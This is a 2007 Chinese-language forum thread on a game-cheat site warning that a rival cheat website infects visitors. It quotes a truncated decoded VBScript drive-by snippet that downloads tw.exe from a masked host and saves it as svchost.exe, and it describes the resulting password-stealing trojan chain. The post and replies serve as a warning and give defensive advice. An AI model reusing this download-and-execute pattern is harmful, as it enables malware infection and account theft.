黃易群俠傳M脫機外掛應用程式黃易神行
2725
6

[地雷快報] 風雲外掛網中的木馬分析

安南 發表於 2007-7-10 11:41:43 | 只看該作者 回帖獎勵 |倒序瀏覽 |
風雲工作室提供大量繁體外掛資訊,通知對風雲源碼分析,此網站與我們公佈的“365遊戲輔助工具”假外掛網為同一人製作。使用的木馬程式也一樣。

以下為此網站如何讓會員中木馬。
聯合國對風雲網的代碼解密,發現此網站在網頁中加入了VBS代碼(腳本技術),自動下載,執行木馬程式tw.exe與svchost.exe(正常svchost.exe是在WINDOWS\system32中),以下為解密後的一段代碼:(為了安全只公佈一段)
  1. <script language="VBScript.Encode">
  2. y = "http://www.XXXX.com/ief/lr/tw.exe"
  3. m4="down"
  4. m5="file"
  5. m6="copy"
  6. m7="exit"
  7. Set yc = document.createElement("object")
  8. yc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  9. ................
  10. yd.Open yh, y, False
  11. yd.Send
  12. y9="svchost.exe"
  13. set yb = yc.createobject("Scripting.FileSystemObject","")
  14. set ye = yb.GetSpecialFolder(2)
  15. ................
複製代碼

以上是“風雲工作室”使用的自動下載,開啟木馬的源碼。


如何防範像“風雲工作室”一樣的網站?
修復windows的最新漏洞就可以防範木馬網站自動下載木馬程式的腳本執行。

木馬程式分析。
svchost.exe分析:
此程式是“風雲工作室”網站的htm代碼,你執行此程式時會自動重複下載最新的木馬程式。
tw.exe分析:
木馬下載程式(Trojan-Downloader),此程式是用來自動下載最新盜號木馬程式(Trojan-PSW)。
現在我拿到的tw.exe會自動下載,執行servnet.exe木馬程式到WINDOWS\system32,自動執行servnet.exe後會修改IE瀏覽器來更新盜號木馬程式
收藏收藏 分享分享 讚 幹 分享分享 FB分享
回覆

使用道具 舉報


asa74185222 該用戶已被刪除
asa74185222 2007-7-10 13:17:34
提示: 作者被禁止或刪除 內容自動屏蔽
回覆

使用道具 舉報

好小子01 當前離線
UID
393018
熱心
39 值
嘉獎
0 次
違規
0 次
在線時間
339 小時
經驗
59 點
積分
2900
精華
0
最後登錄
2016-8-29
閱讀權限
40
註冊時間
2007-6-6
論壇幣
2440 幣
聯合幣
21 枚
幸運鑽
0 顆
招待卷
0 點
查看詳細資料
Rank: 5Rank: 5Rank: 5
好小子01 2007-7-10 13:41:38
謝謝安南版主
趕快來去更新WINDOWS..
回覆

使用道具 舉報

sumingxwyt 當前離線
UID
161667
熱心
30 值
嘉獎
0 次
違規
0 次
在線時間
70 小時
經驗
30 點
積分
30
精華
0
最後登錄
2010-8-22
閱讀權限
20
註冊時間
2007-1-24
論壇幣
26 幣
聯合幣
0 枚
幸運鑽
0 顆
招待卷
0 點
查看詳細資料
Rank: 2Rank: 2
sumingxwyt 2007-7-12 13:39:24
請問...如果中了svchost怎麼解毒阿??
我好像中了...希望大大幫個忙...yociexp171.gif
回覆

使用道具 舉報

abc39cba 當前離線
UID
34755
熱心
137 值
嘉獎
0 次
違規
0 次
在線時間
206 小時
經驗
131 點
積分
131
精華
0
最後登錄
2011-10-5
閱讀權限
20
註冊時間
2006-8-29
論壇幣
936 幣
聯合幣
0 枚
幸運鑽
0 顆
招待卷
19446 點
查看詳細資料
Rank: 2Rank: 2
5
abc39cba 2007-7-12 17:13:33
太危險了!好在有安大的熱心!
回覆

使用道具 舉報

skymoon 該用戶已被刪除
6
skymoon 2007-7-13 13:35:04
提示: 作者被禁止或刪除 內容自動屏蔽
回覆

使用道具 舉報

ter906 該用戶已被刪除
7
ter906 2007-7-19 17:05:49
提示: 作者被禁止或刪除 內容自動屏蔽
回覆

使用道具 舉報

您需要登錄後才可以回帖 登錄 | 註冊


手機版 | Archiver | 外掛聯合國

GMT+8, 2024-4-29 19:27 , Processed in 0.059038 second(s), 17 queries , Memcache On.

版權說明:
  本站不會製作、經銷、代理外掛程式。僅免費提供外掛程式下載前之掃毒及掃木馬等安全檢測驗證,協助會員遠離盜號危險程式。本站所有資料均來自網際網路收集整理,說明文字暨下載連結轉載自原程 式開發站。站上出現之公司名稱、遊戲名稱、程式等,商標及著作權,均歸各公司及程式原創所有,本站程式所有權歸外掛聯合國所有。本程式所有權歸外掛聯合國所有.......

回頂部
第二步?
第三步?